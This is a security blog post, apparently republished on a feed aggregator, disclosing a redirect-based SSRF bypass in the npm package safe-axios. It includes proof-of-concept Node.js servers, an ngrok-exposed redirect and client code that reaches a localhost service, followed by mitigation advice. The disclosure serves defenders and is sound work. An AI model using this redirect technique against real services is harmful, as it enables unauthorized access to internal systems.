惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

WordPress大学
WordPress大学
博客园 - 司徒正美
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
A
About on SuperTechFans
Google DeepMind News
Google DeepMind News
T
Tailwind CSS Blog
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
M
MIT News - Artificial intelligence
L
LangChain Blog
aimingoo的专栏
aimingoo的专栏
Engineering at Meta
Engineering at Meta
Martin Fowler
Martin Fowler
H
Help Net Security
B
Blog
Y
Y Combinator Blog
小众软件
小众软件
S
SegmentFault 最新的问题
I
InfoQ
爱范儿
爱范儿
Hugging Face - Blog
Hugging Face - Blog
D
Docker
博客园 - 【当耐特】
J
Java Code Geeks
阮一峰的网络日志
阮一峰的网络日志

NodeJS Security & NodeJS Secure Coding's Blog

Hardening Your npm and pnpm Configs in the Age of Shai-Hulud Argument Injection vulnerability in git-blame@1.4.0 Argument Injection vulnerability in `gits@0.1.8` Command Injection vulnerability in `@fab1o/git@1.4.0` Command Injection vulnerability in `git-contributors` via unsanitized CLI arguments Command Injection vulnerability in `git-q@0.0.3` Command injection vulnerability via unsanitized CLI arguments in touxing/fast-git-clone Command Injection vulnerability in `willitmerge@0.2.1` A Directory Traversal Vulnerability I found in Mastra AI Frameworks MCP Server Mastering NPX: A Cheatsheet for npm and Node.js Power Users Mitigate Supply Chain Security with DevContainers and 1Password for Node.js Local Development The Tale of the Vulnerable MCP Database Server Bad Security Defaults in Mastra AI Frameworks Templates SQL Injection and Bypassing "Read-Only" Mode in Xata's MCP Server Security Advisory for qix npm supply-chain compromise affecting debug and billions of weekly download users How to Mitigate SQL Bypass in MCP Servers Enhancing MCP Server Security: A Guide to Using execFile Argument Injection Vulnerability in ggit How to Bypass Access Control in PostgreSQL in Simple PSQL MCP Server for SQL Injection Command Injection Flaws in ggit: Unveiling a Vulnerability Command Injection Vulnerability in Create MCP Server STDIO Tool Exposes System Monitoring Functions GitHub Kanban MCP Server Command Injection Vulnerability Threatens Developer Workflows Critical Command Injection Flaw in iOS Simulator MCP Server Exposes Development Environments Command Injection Vulnerability Discovered in Codehooks MCP Server: A Critical Security Analysis SSRF Vulnerability in safe-axios: Unintended Public Address Classification Bypassing SSRF Safeguards in ssrfcheck: A Case of Incomplete Denylists Don't Be Fooled by Multicast, SSRF Bypass in private-ip Node.js Authentication from Lucia to Better Auth Bypassing SSRF Protection in nossrf: When Your Safeguards Become Loopholes Vue CLI Security Fix to Mitigate NPM Binary Planting
SSRF Shenanigans in safe-axios: Redirects Open the Backdoor
2025-06-08 · via NodeJS Security & NodeJS Secure Coding's Blog

Brace yourselves for an in-depth exploration of a critical yet common SSRF vulnerability within safe-axios, an npm package designed to shield applications from SSRF (Server-Side Request Forgery) attacks.

While safe-axios attempts to validate URLs, a gap in its defenses allows malicious actors to exploit redirects for nefarious purposes. Let’s dissect the technical details, craft a proof-of-concept exploit, and emphasize the importance of robust SSRF protection strategies.

Demystifying safe-axios: A (Partially) Fortified Wall

SSRF vulnerabilities arise when an application unwittingly makes requests to external servers based on user-controlled input. This can be exploited to steal sensitive data, execute unauthorized actions, or disrupt operations.

safe-axios steps in as a defense mechanism. It validates URLs through a static denylist of IP addresses and ranges. If the resolved IP falls within this list, the request is flagged as potentially risky. However, this approach is not foolproof.

The Vulnerability: Redirects Lead Us Astray

The crux of the issue lies in how safe-axios handles redirects. While it validates the initial URL, it fails to consider subsequent requests triggered by the server’s response. Here’s the scenario:

  • An attacker provides a seemingly harmless URL (e.g., https://attacker.com/legitimate).
  • safe-axios validates the URL and allows the request.
  • The attacker’s server responds with a redirect header (e.g., Location: http://internal-server:8080/sensitive).
  • safe-axios, lacking proper redirect validation, blindly follows the redirect, potentially reaching an internal or unauthorized resource.

This bypass hinges on the attacker’s ability to control the redirect location. By crafting a response with a strategically placed Location header, they can manipulate safe-axios into fetching unauthorized data or executing unintended actions.

Crafting the SSRF Exploit

To illustrate this vulnerability, let’s set up a simple demonstration environment:

  1. Install the safe-axios package:
  1. Create a local server that listens on localhost:3000 and serves as the attacker’s “legitimate” remote server:

const http = require('http');

const server = http.createServer((req, res) => {

res.writeHead(302, { 'Location': 'http://localhost:3002' });

res.end();

});

server.listen(3000, () => {

console.log('Server listening on port 3000');

});

Expose this server via legitimate public IP address such as via ngrok: ngrok http 3000

  1. Create a second local server that listens on localhost:3002 and serves as the attacker’s malicious server:

const http = require('http');

const server = http.createServer((req, res) => {

res.writeHead(200, { 'Content-Type': 'text/plain' });

res.write('Hello, world!\n');

res.end();

});

server.listen(3002, () => {

console.log('Server listening on port 3002');

});

Run this server too.

  1. Define an app.js file with the programmatic API of safe-axios:

import SafeAxios from 'safe-axios';

async function main() {

const safeAxios = SafeAxios.default;

// safe-axios successfully blocks this request

// const data = await safeAxios.request({url: 'https://localhost:3000/test'});

// safe-axios fails to block this request which uses a SSRF Redirect technique to

// resolve to a public IP address that then includes a private IP address as a redirect

// in a Location header, which safeAxios follows by default

const data = await safeAxios.request({url: 'https://2550-4-180-183-243.ngrok-free.app/test'});

console.log(data)

}

main();

  1. Running the Show: start both local servers (localhost:3000 and localhost:3002). Run the app.js script. Observe how safe-axios allows the request and retrieves data from the attacker’s server, bypassing the intended SSRF protection.

Conclusion: Safeguarding Against SSRF Shenanigans

This vulnerability underscores the importance of comprehensive SSRF protection. While safe-axios provides a solid foundation, it falls short in handling redirects securely. To mitigate such risks, consider the following strategies:

  • Implement strict URL validation and denylist checks for both initial requests and subsequent redirects.
  • Enforce proper handling of HTTP status codes and headers to prevent unauthorized access.
  • Do not follow redirects without thorough validation, especially when dealing with user-controlled input.
  • Regularly update security libraries and packages to patch known vulnerabilities and strengthen defenses.

SSRF also presents other networking-related challenges for developers to overcome, such as DNS rebinding attacks. It is also highly susceptible to cloud-based attacks, where attackers exploit cloud services to bypass traditional network security measures through a TOCTOU (Time of Check to Time of Use) vulnerabilities.

Good security practices, and following secure coding conventions such as those depicted in my Node.js Secure Coding educational training are essential to teach developers how to avoid common pitfalls and protect their applications from SSRF and other threats.